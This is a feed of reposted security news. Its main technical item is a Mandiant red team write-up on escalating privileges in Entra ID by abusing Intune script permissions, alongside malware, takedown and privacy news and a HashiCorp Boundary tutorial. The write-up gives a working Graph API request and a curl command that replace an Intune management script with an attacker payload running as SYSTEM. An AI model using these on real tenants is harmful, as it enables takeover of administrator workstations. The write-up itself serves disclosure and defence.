Wednesday, November 6, 2024

(In)tuned to Takeovers: Abusing Intune Permissions for Lateral Movement and Privilege Escalation in Entra ID Native Environments

Written by: Thibault Van Geluwe de Berlaere, Karl Madden, Corné de Jong


The Mandiant Red Team recently supported a client in visualizing the possible impact of a compromise by an advanced threat actor. During the assessment, Mandiant moved laterally from the customer’s on-premises environment to their Microsoft Entra ID tenant and obtained privileges to compromise existing Entra ID service principals installed in the tenant. 

In this blog post, we will show a novel way adversaries can move laterally and elevate privileges within Microsoft Entra ID when organizations use a popular security architecture involving Intune-managed Privileged Access Workstations (PAWs), by abusing Intune permissions (DeviceManagementConfiguration.ReadWrite.All) granted to Entra ID service principals. We also provide remediation steps and recommendations to prevent and detect this type of attack.

Pretext

The customer had a mature security architecture following Microsoft’s recommended Enterprise Access model, including:

  • An on-premises environment using Active Directory, following the Tiered Model

  • An Entra ID environment, synced to the on-premises environment using Microsoft Entra Connect Sync to synchronize on-premises identities and groups to Entra ID. This environment was administered using PAWs, which were not joined to the on-premises Active Directory environment, but instead were fully cloud-native and managed by Intune Mobile Device Management (MDM). IT administrators used a dedicated, cloud-native (non-synced) administrative account to log in to these systems. Entra ID role assignments (Global Administrator, Privileged Role Administrator, et cetera.) were exclusively assigned to these cloud-native administrative accounts.

The separation of administrative accounts, devices and privileges between the on-premises environment and the Entra ID environment provided a strong security boundary:

  1. Using separate, cloud-native identities for Entra ID privileged roles ensures a compromise of the on-premises Active Directory cannot be used to compromise the Entra ID environment. This is a Microsoft best practice.

  2. Using separate physical workstations for administrative access to on-premises resources and cloud resources effectively creates an ‘air gap’ between the administration plane of the two environments. Air gaps are especially difficult for attackers to cross.

  3. The administrative accounts in Entra ID were assigned roles through Privileged Identity Management enforced by strong Conditional Access policies, requiring a managed, compliant device and multi-factor authentication. These are also Microsoft-recommended best practices.

Attack Path

As part of the assessment objectives, the Mandiant Red Team was tasked with obtaining Global Administrator privileges in the Entra ID tenant. Through various techniques out of scope for this blog post, Mandiant obtained privileges in the Entra ID tenant to add credentials to Entra ID service principals (microsoft.directory/servicePrincipals/credentials/update), allowing the Red Team to compromise any preinstalled service principal.

A few publicly known techniques exist to abuse service principal privileges to obtain elevated permissions, most notably using the RoleManagement.ReadWrite.Directory, AppRoleAssignment.ReadWrite.All and Application.ReadWrite.All Microsoft Graph permissions. 

None of these permissions were in use in the customer’s environment though, forcing the Mandiant Red Team to rethink their strategy. 

Mandiant used the excellent ROADTools framework to gain further insight into the customer’s Entra ID environment, and discovered a service principal that was granted the DeviceManagementConfiguration.ReadWrite.All permission.

Figure 1: Service principal was granted DeviceManagementConfiguration.ReadWrite.All permissions (screenshot from ROADTools)

This permission allows the service principal to "read and write Microsoft Intune device configuration and policies".

Intune’s device management scripts are custom PowerShell scripts that can run on clients running Windows 10 and later. The ability to run scripts on local devices gives administrators a way to configure settings that are not available through the configuration policies or the apps part of Intune. Management scripts are executed when the device starts, with administrative privileges (NT AUTHORITY\SYSTEM).

Figure 2: Intune management scripts are executed at startup

The DeviceManagementConfiguration.ReadWrite.All permission is sufficient to list, read, create and update management scripts through the Microsoft Graph API.

Figure 3: Device management scripts can be modified with DeviceManagementConfiguration.ReadWrite.All

The management script can easily be created or modified using the Microsoft Graph API. The following figure shows an example HTTP request to modify an existing script.

PATCH https://graph.microsoft.com/beta/deviceManagement/deviceManagementScripts/<script id>

{
  "@odata.type": "#microsoft.graph.deviceManagementScript",
  "displayName": "<display name>",
  "description": "<description>", 
  "scriptContent": "<PowerShell script in base64 encoding>",
  "runAsAccount": "system",
  "enforceSignatureCheck": false,
  "fileName": "<filename>",
  "roleScopeTagIds": [
    "<existing role scope tags>"
  ],
  "runAs32Bit": false
}

The Graph API allows the caller to specify the PowerShell script content as a Base64-encoded value, along with a display name, file name, and description. The runAsAccount value can be set to user or system, depending on the principal the script should execute as. The roleScopeTagIds value references Scope Tags, an Intune mechanism that groups devices and users together. These can also be created and managed with the DeviceManagementConfiguration.ReadWrite.All permission. 
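As a rough illustration, a modification like the one above can be performed with nothing more than curl and an app-only access token obtained via the client credentials flow for the compromised service principal. The token, script ID, and payload file below are placeholders rather than values from the engagement, and this is a sketch of the technique, not the exact tooling used.

# Sketch only: assumes $TOKEN holds an app-only Microsoft Graph token for the
# service principal and $SCRIPT_ID is the ID of an existing device management script.
PAYLOAD=$(base64 -w0 payload.ps1)   # attacker-controlled PowerShell, runs as SYSTEM

curl -s -X PATCH \
  "https://graph.microsoft.com/beta/deviceManagement/deviceManagementScripts/$SCRIPT_ID" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{
    \"@odata.type\": \"#microsoft.graph.deviceManagementScript\",
    \"displayName\": \"Existing script name\",
    \"scriptContent\": \"$PAYLOAD\",
    \"runAsAccount\": \"system\",
    \"enforceSignatureCheck\": false,
    \"fileName\": \"existing-script.ps1\",
    \"runAs32Bit\": false
  }"

The same permission also allows enumerating existing scripts first (a GET on the same deviceManagementScripts endpoint) to pick one that is already assigned to the PAW device group.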

The DeviceManagementConfiguration.ReadWrite.All permission allowed Mandiant to move laterally to the PAWs used for Entra ID administration by modifying an existing device management script to execute a Mandiant-controlled PowerShell script. When the device reboots as part of the user’s daily work, the Intune management script is triggered and executes the malicious script. 

By launching a command-and-control implant, Mandiant could execute arbitrary commands on the PAWs. The Red Team waited for the victim to activate their privileged role through Azure Privileged Identity Management and impersonated the privileged account (e.g., through cookie or token theft), thereby obtaining privileged access to Entra ID. These steps allowed Mandiant to obtain Global Administrator privileges in Entra ID, completing the objective of this assessment.

Remediation and Recommendations

Mandiant offers the following hardening recommendations to prevent this attack scenario:

  1. Review your organization’s security principals for the DeviceManagementConfiguration.ReadWrite.All permission: Organizations using Microsoft Intune for device management should treat the DeviceManagementConfiguration.ReadWrite.All permission as sensitive, as it gives the trustee a control relationship over the Intune-managed devices, and by extension, any identities associated with the device.

    Mandiant recommends organizations to regularly review the permissions granted to Azure service principals, paying special attention to the
    DeviceManagementConfiguration.ReadWrite.All permission, as well as other sensitive permissions (e.g., RoleManagement.ReadWrite.Directory, AppRoleAssignment.ReadWrite.All and Application.ReadWrite.All).

    Organizations that use Intune to manage PAWs should be especially careful when delegating Intune privileges (either through DeviceManagementConfiguration.ReadWrite.All or through Entra roles such as Intune Administrator).

  2. Enable multiple admin approval for Intune: Intune supports using Access Policies to require a second administrator to approve any changes before a change is applied. This would prevent an attacker from creating or modifying management scripts with a single compromised account.
  3. Consider enabling Microsoft Graph API activity logs: Enabling Graph API activity logs can help detection and response efforts by providing detailed information about Graph API HTTP requests made to Microsoft Graph resources.

  4. Utilize capabilities provided by Workload ID Premium licenses: When licensed for Workload ID Premium, Mandiant recommends leveraging these capabilities to:

    • Restrict privileged service principal usage to known trusted locations only. This limits the risk of unauthorized access and strengthens security by ensuring service principals can only be used from trusted locations. 
    • Enhance the security of service principals by enabling risk detections in Microsoft Identity Protection. This can proactively block access when suspicious activities or risk factors are identified.
  5. Proactively monitor service principal sign-ins: Proactively monitoring sign-ins from service principals can help detect anomalies and potential threats. Integrate this data into security operations to trigger alerts and enable rapid response to unauthorized access attempts.

Through numerous adversarial emulation engagements, Red Team Assessments, and Purple Team Assessments, Mandiant has gained an in-depth understanding of the unique paths attackers may take in compromising their target’s cloud estate. Review our Technical Assurance services and contact us for more information.



from Threat Intelligence https://ift.tt/FI0nVRX
via IFTTT

New Winos 4.0 Malware Infects Gamers Through Malicious Game Optimization Apps

Nov 06, 2024Ravie LakshmananMalware / Online Security

Cybersecurity researchers are warning that a command-and-control (C&C) framework called Winos is being distributed within gaming-related applications like installation tools, speed boosters, and optimization utilities.

"Winos 4.0 is an advanced malicious framework that offers comprehensive functionality, a stable architecture, and efficient control over numerous online endpoints to execute further actions," Fortinet FortiGuard Labs said in a report shared with The Hacker News. "Rebuilt from Gh0st RAT, it includes several modular components, each handling distinct functions."

Campaigns distributing Winos 4.0 were documented back in June by Trend Micro and the KnownSec 404 Team. The cybersecurity companies are tracking the activity cluster under the names Void Arachne and Silver Fox.

Attacks have been observed targeting Chinese-speaking users, leveraging black hat Search Engine Optimization (SEO) tactics, social media, and messaging platforms like Telegram to distribute the malware.

Fortinet's latest analysis shows that users who end up running the malicious game-related applications trigger a multi-stage infection process that begins with retrieving a fake BMP file from a remote server ("ad59t82g[.]com") that's then decoded into a dynamic-link library (DLL).

The DLL file takes care of setting up the execution environment by downloading three files from the same server: t3d.tmp, t4d.tmp, and t5d.tmp, the first two of which are subsequently unpacked to obtain the next set of payloads comprising an executable ("u72kOdQ.exe") and three DLL files, including "libcef.dll."

"The DLL is named '学籍系统,' meaning 'Student Registration System,' suggesting that the threat actor may be targeting educational organizations," Fortinet said.

In the next step, the binary is employed to load "libcef.dll," which then extracts and executes the second-stage shellcode from t5d.tmp. The malware proceeds to establish contact with its command-and-control (C2) server ("202.79.173[.]4") using the TCP protocol and retrieve another DLL ("上线模块.dll").

The third-stage DLL, part of Winos 4.0, downloads encoded data from the C2 server, a fresh DLL module ("登录模块.dll") that's responsible for harvesting system information, copying clipboard content, gathering data from cryptocurrency wallet extensions like OKX Wallet and MetaMask, and facilitating backdoor functionality by awaiting further commands from the server.

Winos 4.0 also enables the delivery of additional plugins from the C2 server that allow it to capture screenshots and upload sensitive documents from the compromised system.

"Winos4.0 is a powerful framework, similar to Cobalt Strike and Sliver, that can support multiple functions and easily control compromised systems," Fortinet said. "Threat campaigns leverage game-related applications to lure a victim to download and execute the malware without caution and successfully deploy deep control of the system."




from The Hacker News https://ift.tt/fHwotky
via IFTTT

Cloud News of the Month - October 2024

Brian Gracely and Brandon Whichard discuss the top stories in Cloud and AI from October 2024.

SHOW: 871

SHOW TRANSCRIPT:
The Cloudcast #871 Transcript

SHOW VIDEO: https://youtube.com/@TheCloudcastNET

CLOUD NEWS OF THE WEEK - http://bit.ly/cloudcast-cnotw

NEW TO CLOUD? CHECK OUT OUR OTHER PODCAST - "CLOUDCAST BASICS"

SHOW NOTES:

SEGMENTS COVERED IN THE SHOW:

  • Good Old Fashioned Cloud News
  • The AI Innovation Continues 

FEEDBACK?



from The Cloudcast (.NET) https://ift.tt/1cFyCvT
via IFTTT

INTERPOL Disrupts Over 22,000 Malicious Servers in Global Crackdown on Cybercrime

Nov 06, 2024Ravie LakshmananCyber Threat / Cybercrime

INTERPOL on Tuesday said it took down more than 22,000 malicious servers linked to various cyber threats as part of a global operation.

Dubbed Operation Synergia II, the coordinated effort ran from April 1 to August 31, 2024, targeting phishing, ransomware, and information stealer infrastructure.

"Of the approximately 30,000 suspicious IP addresses identified, 76 per cent were taken down and 59 servers were seized," INTERPOL said. "Additionally, 43 electronic devices, including laptops, mobile phones and hard disks were seized."

The actions also led to the arrest of 41 individuals, with 65 others still under investigation. Some of the other key outcomes across countries are listed below -

  • Takedown of more than 1,037 servers by Hong Kong police
  • Seizure of a server and the identification of 93 individuals with links to illegal cyber activities in Mongolia
  • Disruption of 291 servers in Macau
  • Identification of 11 individuals with links to malicious servers and the seizure of 11 electronic devices in Madagascar
  • Seizure of more than 80GB worth of data in Estonia

Group-IB, which was one of the private sector partners alongside Kaspersky, Team Cymru, and Trend Micro, said it identified over 2,500 IP addresses linked to 5,000 phishing websites, and more than 1,300 IP addresses tied to various malware activities spanning 84 countries.

David Monnier, chief evangelist at Team Cymru, said it contributed to the effort by "identifying and categorizing malicious infrastructure" following extensive analysis.

The first phase of Synergia took place between September and November 2023, leading to 31 arrests and the identification of 1,300 suspicious IP addresses and URLs used for phishing, banking malware, and ransomware attacks.




from The Hacker News https://ift.tt/cd3fBjr
via IFTTT

CrowdStrike to Acquire Adaptive Shield to Deliver Integrated SaaS Security Posture Management



from Blog https://ift.tt/acNmu1d
via IFTTT

South Korea Fines Meta $15.67M for Illegally Sharing Sensitive User Data with Advertisers

Nov 06, 2024Ravie LakshmananData Privacy / Tech Regulation

Meta has been fined 21.62 billion won ($15.67 million) by South Korea's data privacy watchdog for illegally collecting sensitive personal information from Facebook users, including data about their political views and sexual orientation, and sharing it with advertisers without their consent.

The country's Personal Information Protection Commission (PIPC) said Meta gathered information such as religious affiliations, political views, and same-sex marital status of about 980,000 domestic Facebook users and shared it with 4,000 advertisers.

"Specifically, it was found that behavioral information, such as the pages that users 'liked' on Facebook and the ads they clicked on, was analyzed to create and operate advertising topics related to sensitive information," the PIPC said in a press statement.

These topics categorized users as following a certain religion, identifying them as a gay or transgender person, or being a defector from North Korea, it added.

The agency accused Meta of processing such sensitive information without a proper legal basis, and that it did not seek users' consent before doing so.

It also called out the tech giant for failing to enact safety measures to secure inactive accounts, thereby allowing malicious actors to request password resets for those accounts by submitting fake identification information. Meta approved such requests without sufficient verification of the fake IDs, resulting in the leak of the personal information of 10 South Korean users.

"Going forward, the Personal Information Protection Commission will continue to monitor whether Meta is complying with its corrective order, and will do its best to protect the personal information of our citizens by applying the protection law without discrimination to global companies that provide services to domestic users," the regulator said.

Meta, in a statement shared with Associated Press, said it will "carefully review" the commission's decision.




from The Hacker News https://ift.tt/SZBqb6g
via IFTTT

Tuesday, November 5, 2024

FBI Seeks Public Help to Identify Chinese Hackers Behind Global Cyber Intrusions

The U.S. Federal Bureau of Investigation (FBI) has sought assistance from the public in connection with an investigation involving the breach of edge devices and computer networks belonging to companies and government entities.

"An Advanced Persistent Threat group allegedly created and deployed malware (CVE-2020-12271) as part of a widespread series of indiscriminate computer intrusions designed to exfiltrate sensitive data from firewalls worldwide," the agency said.

"The FBI is seeking information regarding the identities of the individuals responsible for these cyber intrusions."

The development comes in the aftermath of a series of reports published by cybersecurity vendor Sophos chronicling a set of campaigns between 2018 and 2023 that exploited its edge infrastructure appliances to deploy custom malware or repurpose them as proxies to evade detection.

The malicious activity, codenamed Pacific Rim and designed to conduct surveillance, sabotage, and cyber espionage, has been attributed to multiple Chinese state-sponsored groups, including APT31, APT41, and Volt Typhoon. The earliest attack dates back to late 2018, when a cyber-attack was aimed at Sophos' Indian subsidiary Cyberoam.

"The adversaries have targeted both small and large critical infrastructure and government facilities, primarily in South and Southeast Asia, including nuclear energy suppliers, a national capital's airport, a military hospital, state security apparatus, and central government ministries," Sophos said.

Some of the subsequent mass attacks have been identified as leveraging multiple then zero-day vulnerabilities in Sophos firewalls – CVE-2020-12271, CVE-2020-15069, CVE-2020-29574, CVE-2022-1040, and CVE-2022-3236 – to compromise the devices and deliver payloads both to the device firmware and those located within the organization's LAN network.

"From 2021 onwards the adversaries appeared to shift focus from widespread indiscriminate attacks to highly targeted, 'hands-on-keyboard' narrow-focus attacks against specific entities: government agencies, critical infrastructure, research and development organizations, healthcare providers, retail, finance, military, and public-sector organizations primarily in the Asia-Pacific region," it said.

Beginning mid-2022, the attackers are said to have focused their efforts on gaining deeper access to specific organizations, evading detection, and gathering more information by manually executing commands and deploying malware like Asnarök, Gh0st RAT, and Pygmy Goat, a sophisticated backdoor capable of providing persistent remote access to Sophos XG Firewalls and likely other Linux devices.

"While not containing any novel techniques, Pygmy Goat is quite sophisticated in how it enables the actor to interact with it on demand, while blending in with normal network traffic," the U.K. National Cyber Security Centre (NCSC) said.

"The code itself is clean, with short, well-structured functions aiding future extensibility, and errors are checked throughout, suggesting it was written by a competent developer or developers."

The backdoor, a novel rootkit that takes the form of a shared object ("libsophos.so"), has been found to be delivered following the exploitation of CVE-2022-1040. The use of the rootkit was observed between March and April 2022 on a government device and a technology partner, and again in May 2022 on a machine in a military hospital based in Asia.

It has been attributed to the handiwork of a Chinese threat actor internally tracked by Sophos as Tstark, which shares links to the University of Electronic Science and Technology of China (UESTC) in Chengdu.

It comes with the "ability to listen for and respond to specially crafted ICMP packets, which, if received by an infected device, would open a SOCKS proxy or a reverse shell back-connection to an IP address of the attacker's choosing."

Sophos said it countered the campaigns in their early stages by deploying a bespoke kernel implant of its own onto devices owned by Chinese threat actors and used to carry out malicious exploit research, including machines owned by Sichuan Silence Information Technology's Double Helix Research Institute, thereby gaining visibility into a "previously unknown and stealthy remote code execution exploit" in July 2020.

A follow-up analysis in August 2020 led to the discovery of a lower-severity post-authentication remote code execution vulnerability in an operating system component, the company added.

Furthermore, the Thoma Bravo-owned company said it has observed a pattern of receiving "simultaneously highly helpful yet suspicious" bug bounty reports at least twice (CVE-2020-12271 and CVE-2022-1040) from what it suspects are individuals with ties to Chengdu-based research institutions prior to them being used maliciously.

The findings are significant, not least because they show that active vulnerability research and development activity is being conducted in the Sichuan region, and then passed on to various Chinese state-sponsored frontline groups with differing objectives, capabilities, and post-exploitation techniques.

"With Pacific Rim we observed [...] an assembly line of zero-day exploit development associated with educational institutions in Sichuan, China," Chester Wisniewski said. "These exploits appear to have been shared with state-sponsored attackers, which makes sense for a nation-state that mandates such sharing through their vulnerability-disclosure laws."

The increased targeting of edge network devices also coincides with a threat assessment from the Canadian Centre for Cyber Security (Cyber Centre) that revealed at least 20 Canadian government networks have been compromised by Chinese state-sponsored hacking crews over the past four years to advance its strategic, economic, and diplomatic interests.

It also accused Chinese threat actors of targeting its private sector to gain a competitive advantage by collecting confidential and proprietary information, alongside supporting "transnational repression" missions that seek to target Uyghurs, Tibetans, pro-democracy activists, and supporters of Taiwanese independence.

Chinese cyber threat actors "have compromised and maintained access to multiple government networks over the past five years, collecting communications and other valuable information," it said. "The threat actors sent email messages with tracking images to recipients to conduct network reconnaissance."




from The Hacker News https://ift.tt/nBjcgZ2
via IFTTT

Secure remote access to private HTTPS targets with HashiCorp Boundary

In my role as a solutions engineer, I’ve talked to many customers and practitioners about HashiCorp Boundary over the past year or so, and one of the main questions that always gets asked is: “How does Boundary secure remote access to HTTPS targets?”

Before Boundary 0.18, Boundary would use the 127.0.0.1 address and port as its proxy address to initiate a session. When Boundary opens a listening socket for connection proxying, most applications apply normal TLS verification logic, which requires the hostname or IP address being connected to to be present on the server’s certificate in order to establish a connection. Most certificates do not include an IP Subject Alternative Name (SAN) of 127.0.0.1 for legitimate security reasons, including local trust issues, cross-application risks, and certificate management. Furthermore, most customers are unwilling or unable to provision updated certificates that contain that IP SAN. Therefore, it was usually not possible to access HTTPS targets with Boundary.

Transparent sessions greatly simplify this workflow. In this blog, I’ll outline some background on Boundary vs. VPNs, Boundary aliases, and the new transparent sessions feature. To conclude, I’ll show you a working example of a transparent sessions workflow for setting up secure remote access to private HTTPS targets. This example is not intended to serve as a best practice or HashiCorp-recommended practice, but rather to show what can be achieved and to give practitioners a working example to explore and build upon.

Boundary vs. VPN

Boundary often gets compared to a traditional VPN solution; however, unlike a VPN, Boundary does not bridge the user onto the entire network. Instead, Boundary leverages your Identity Providers (IdP) to enable more granular control over which resources within the network individuals, or groups of individuals, have access to. This helps mitigate the lateral access that often results from using a traditional VPN solution.

In one of my previous blogs, I discussed and demonstrated the implementation of a multi-hop deployment with Boundary. This allowed users to securely access resources sitting in an RFC1918 address space from the comfort of their own home, without the need for a VPN solution. However, that multi-hop deployment specifically addressed accessing targets such as SSH, RDP, databases, Kubernetes, and others. Boundary didn't have an adequate solution for HTTPS targets.

Boundary aliases

In the Boundary 0.16 release, the concept of aliases was introduced. Aliases are hostname-style strings that you can assign to a target, which makes targets easier to remember and therefore more user-friendly to access.

Before aliases, if you were using the CLI and wanted to SSH to a specific server in your environment (for example, a web-front-end server), you would have needed one of the following:

  • The target_id written down or stored somewhere convenient, and then to issue the boundary connect ssh -target-id tssh_hjuozD0EmM command (if using application credential injection).
  • The name of the target along with the associated scope ID, and then to issue the boundary connect ssh -target-name webfrontend -target-scope-id p_XUW5XcYAKe command.

If you were using the Boundary Desktop client, and Boundary was managing hundreds or thousands of resources, you would have to know something about that resource, such as name or ID, to save you trawling through numerous pages to find the target in question.

With aliases, you can now give a DNS-like name to the target. For our example above, you could attribute the name prod.webfrontend1, which would replace the need to use the target ID tssh_hjuozD0EmM as the parameter required to connect to a specific target.

Aliases work hand-in-hand with Boundary’s transparent sessions. Transparent sessions enable Boundary to shift from an active to a passive connection process. Instead of users interacting with the Boundary CLI or Desktop client to initiate a session, Boundary will automatically initiate sessions for them anytime they connect using their existing tools (SSH client terminal, PuTTY, RDP client, web browser, etc.). Boundary operates in the background, intercepting DNS calls and routing traffic through a session if the user is authenticated and authorized.

With transparent sessions, you no longer need to issue any specific Boundary commands and can instead simply run ssh prod.webfrontend1 to SSH to our target. This greatly improves the user experience, as users no longer have to remember vendor-specific commands to achieve a simple SSH connection, in this example. This is all possible because of transparent sessions, which simplify connectivity without relinquishing any of Boundary’s capabilities.

Transparent sessions explained

With transparent sessions, users do not have to directly interact with Boundary itself, i.e. issuing specific Boundary commands to connect via SSH, RDP, HTTPS, etc. to targets. However, the important benefit of connecting securely while imposing granular control over what individual users and/or groups can connect to still remains.

The Boundary Client Agent gets installed onto your machine when you install the new Boundary installer. This agent acts as your system’s DNS daemon. When a user has successfully authenticated into Boundary via the CLI or Desktop Client, the Boundary Client Agent becomes the primary DNS resolver on the machine. The Client Agent will intercept all DNS requests made on the system.

If a destination DNS request matches a Boundary alias that the user is authorized to use, Boundary automatically generates a session and transparently proxies the connection on behalf of the user. In the event that there is not a matching Boundary alias to a destination DNS request, the Client Agent will forward requests to the previously set DNS resolver(s).

The diagram below depicts the example discussed above:

(Diagram: transparent sessions alias workflow)

Here’s what’s happening in each step:

  1. Boundary admin / SRE creates the new alias prod.webfrontend1 and assigns it to the desired target.
  2. After ~2 minutes, the Client Agent alias cache will pull the information about this assignment down to store locally.
  3. The end user then issues the traditional SSH command to prod.webfrontend1. The alias is cached, which helps reduce the load on the Boundary controllers because they are not serving as many requests, and connectivity is now established.

If the Boundary admin / SRE removes the alias, after ~2 minutes if the user tries to SSH again to prod.webfrontend1, it will forward requests to the previously set DNS resolver(s).
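As a minimal sketch of step 1, the alias can be created from the CLI as well as through Terraform or the admin UI; the target ID below is a placeholder, and the flags reflect the aliases subcommand introduced in Boundary 0.16.

# Admin / SRE: create a global-scope alias that points at the web front-end target
boundary aliases create target \
  -scope-id=global \
  -value=prod.webfrontend1 \
  -destination-id=ttcp_1234567890

# End user (step 3), once the Client Agent has cached the alias:
ssh prod.webfrontend1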

Boundary Client Agent

With transparent sessions, a new package is included in the new Boundary installer. This will install new components and/or upgrade any existing Boundary components you already have on your system.

Installing

After installation, the Client Agent becomes the primary DNS resolver on the machine.

Leveraging custom DNS responses

Before transparent sessions, the proxy address was a combination of the localhost address plus the port number. With transparent sessions, the IPv4 address used comes from the RFC6598 Carrier-grade NAT space (CGNAT) (100.64.0.0 to 100.127.255.255) by default.

As an example, if you have a target alias set to internal.hashicorp.com, when you attempt to make a connection to that address, the DNS request is intercepted by the Client Agent and directed to a local IP address, from which the connection is proxied over a normal Boundary session to the real host. The host provides its certificate, and as long as the target alias matches one of the SANs in the certificate, the secure connection will be accepted and established. This is what makes HTTPS targets possible with transparent sessions.

To verify that the Client Agent is the primary DNS server, issue the following command for Mac: % scutil --dns, or % ipconfig /all for Windows.

On a Mac, the output should look similar to the example below:

DNS configuration (for scoped queries)

resolver #1
  search domain[0] : Home
  nameserver[0] : 100.118.180.7
  nameserver[1] : fc00:557b::f451:1d6e
  if_index : 15 (en0)
  flags    : Scoped, Request A records, Request AAAA records
  reach    : 0x00030002 (Reachable,Local Address,Directly Reachable Address)

You can see that the nameserver[0] and nameserver[1] addresses are set by the Client Agent, to support both IPv4 and IPv6. There is no IPv6 equivalent of CGNAT, so the IPv6 address comes from the unique local address (ULA) range.

If you configured an alias for www.hashicorp.com and then ran an nslookup www.hashicorp.com on Mac, or resolve-dnsname www.hashicorp.com on Windows, you would see the IPs of the DNS server used, as well as the DNS request being made and the response.

#DNS response
;; Truncated, retrying in TCP mode.
Server:         100.118.180.7
Address:        100.118.180.7#53

Name:   www.hashicorp.com
Address: 100.119.113.220

Boundary Client Agent operations

The introduction of the Client Agent comes with some commands to manage its operation.

Status

The status command provides the user with the status of the Client Agent. As shown in the output below, you can see the address of the Boundary cluster, the status of the Client Agent, and some information pertaining to the authorization token and version. If there are any errors relating to the operation of the Client Agent, these will be displayed under the ‘Recent errors:’ section. The default auth token expiry is 7 days and is configurable.

% boundary client-agent status                      

Status:
  Address:                 https://12345678-9012-3456-a8a7-6d8c8e1bc44c.boundary.hashicorp.cloud
  Auth Token Expiration:   148h18m48s
  Auth Token Id:           at_fYfwLL7jpB
  Status:                  running
  Version:                 0.1.0
  Recent errors:

Pause

The pause command stops the currently running Client Agent. After you initiate the command, as shown in the output below, you will receive confirmation that the Client Agent has been successfully paused.

% boundary client-agent pause 
The client agent has been successfully paused.

If you check the status of your DNS resolvers again, you will see that DNS has reverted to your previously set resolver(s).

DNS configuration (for scoped queries)

resolver #1
  search domain[0] : Home
  nameserver[0] : 192.168.0.1
  nameserver[1] : fd69:2e4c:8e52:0:3e45:7aff:fe52:9620
  if_index : 15 (en0)
  flags    : Scoped, Request A records, Request AAAA records
  reach    : 0x00020002 (Reachable,Directly Reachable Address)

Resume

The resume command restarts the Client Agent and it will once again become the primary DNS resolver.

% boundary client-agent resume
The client agent has been successfully resumed.

Example deployment: Access to private HTTPS targets with transparent sessions

To illustrate and demonstrate how organizations can leverage Boundary with transparent sessions, I have built the topology outlined below. There are no VPN connections in this workflow, but by leveraging HCP Boundary and multi-hop workers, you can facilitate connectivity into private networks (i.e. your organization’s network) securely, while ensuring organizations do not have to create any additional inbound rules in their firewalls / security rule groups.

Everything has been automated using Terraform, and the code can be found here.

(Diagram: example deployment topology)

I have my domain transparentsessions.com and have created an A-record in Route 53 as test.transparentsessions.com. I have both a public and private VPC with a self-managed Boundary worker in each.

You can see in the private VPC that the address is from the RFC1918 192.168.0.0/16 range and cannot be accessed directly from outside of that network. The EC2 instance that gets deployed in the private VPC is configured to install an Apache web server, create a basic HTML web page, and utilize the Vault PKI secrets engine from HCP Vault Dedicated to fetch the requisite generated certificates that will ensure you can access the site securely using HTTPS. We will configure our machine to trust this CA in a later step.
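As a sketch of what that certificate request can look like, the host can call the PKI secrets engine directly with the Vault CLI; the mount path ("pki") and role name ("transparentsessions") here are assumptions for illustration, not necessarily the names used in the repository's Terraform code.

# Assumes VAULT_ADDR and VAULT_TOKEN point at the HCP Vault Dedicated cluster
vault write pki/issue/transparentsessions \
  common_name="test.transparentsessions.com" \
  ttl="72h"
# The response contains the certificate, private key, and issuing CA,
# which the web server then uses to serve HTTPS for the alias.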

At the bottom of the diagram you have two personas: an authorized user and an unauthorized user. This is a rudimentary example, but I wanted to emphasize that you will need to control/restrict access to HTTPS endpoints/resources within your organization based on different personas.

Assigning an alias

As previously mentioned, you have to assign the Boundary alias to the target in question. In my example, the target is an instance of Ubuntu Linux residing in the private network within AWS. In the Terraform config you have two resources that constitute the target and the alias.

The boundary_target resource is your target within Boundary. The configuration specifies the type to be tcp, allocates the ingress and egress workers to use, sets the project scope for the target to reside in, and sets the default port to be 443 (HTTPS).

resource "boundary_target" "ubuntu_linux_private" {
 type                     = "tcp"
 name                     = "ubuntu-private-linux"
 description              = "Ubuntu Linux Private Target"
 egress_worker_filter     = " \"sm-egress-downstream-worker1\" in \"/tags/type\" "
 ingress_worker_filter    = " \"sm-ingress-upstream-worker1\" in \"/tags/type\" "
 scope_id                 = boundary_scope.project.id
 session_connection_limit = -1
 default_port             = 443
 host_source_ids = [
   boundary_host_set_static.ubuntu_linux_machines.id
 ]
}

The second resource is the boundary_alias_target. Looking at the configuration below, I have specified the scope (at the time of writing, aliases are always defined at the global scope level), the value of the alias, which is set to test.transparentsessions.com, and the destination_id, which is the target that you associate the alias with (in this example, the Ubuntu Linux target outlined above).

resource "boundary_alias_target" "ts_alias_target" {
 name                      = "transparent_sessions_alias_target"
 description               = "Alias to target using test.transparentsessions.com"
 scope_id                  = "global"
 value                     = "test.transparentsessions.com"
 destination_id            = boundary_target.ubuntu_linux_private.id
 authorize_session_host_id = boundary_host_static.ubuntu_private_linux.id
}

Users

To ensure clarity, I only have two personas created, as previously discussed: authorized user and unauthorized user.

For the unauthorized user, I created a user via Terraform.

resource "boundary_account_password" "unauthorized_user" {
 auth_method_id = boundary_auth_method.password.id
 login_name     = "unauthorized"
 password       = "unauthorized"
}

After that, I needed to assign minimal permissions to that user.

resource "boundary_role" "unauthorized" {
 description = "read-auth-token"
 grant_strings = [
   "type=auth-token;ids=*;actions=read:self",
   "type=user;actions=list-resolvable-aliases;ids=*",
 ]
 name          = "read-auth-token"
 principal_ids = [boundary_user.unauthorized_user.id]
 scope_id      = "global"
}

In the above resource, you can see two grant strings that have been added:

  1. "type=auth-token;ids=*;actions=read:self" This ensures that the user can authenticate to the Client Agent.
  2. "type=user;actions=list-resolvable-aliases;ids=*"This ensures that the user can read the aliases that are part of the overall transparent sessions workflow.

No other permissions are granted to this user. Of course, within your organization, users and/or groups will have different grant strings attributed based on who they are and their role(s).

For the authorized user, I have given read access in the global scope and full access in the org and project scopes:

resource "boundary_role" "authorized_global_role" {
 name          = "authorized_global_role"
 description   = "Authorized Global Role"
 scope_id      = "global"
 principal_ids = [boundary_user.authorized_user.id]
 grant_strings = [
   "ids=*;type=*;actions=read",
   "type=auth-token;ids=*;actions=read:self",
   "type=user;actions=list-resolvable-aliases;ids=*",
 ]
}


resource "boundary_role" "authorized_org_role" {
 name          = "authorized_org_role"
 description   = "Authorized Org Role"
 scope_id      = boundary_scope.org.id
 principal_ids = [boundary_user.authorized_user.id]
 grant_strings = ["ids=*;type=*;actions=*"]
} 


resource "boundary_role" "authorized_project_role" {
 name          = "authorized_project_role"
 description   = "Authorized Project Role"
 scope_id      = boundary_scope.project.id
 principal_ids = [boundary_user.authorized_user.id]
 grant_strings = ["ids=*;type=*;actions=*", ]
}

Add trusted cert to the keychain

After the Terraform deployment has finished, the pki_root.crt file will be created in the directory. For this demo, you need to add it to the keychain on your machine in order to trust the certificate authority (CA) that generated it. In this example, the CA is Vault.

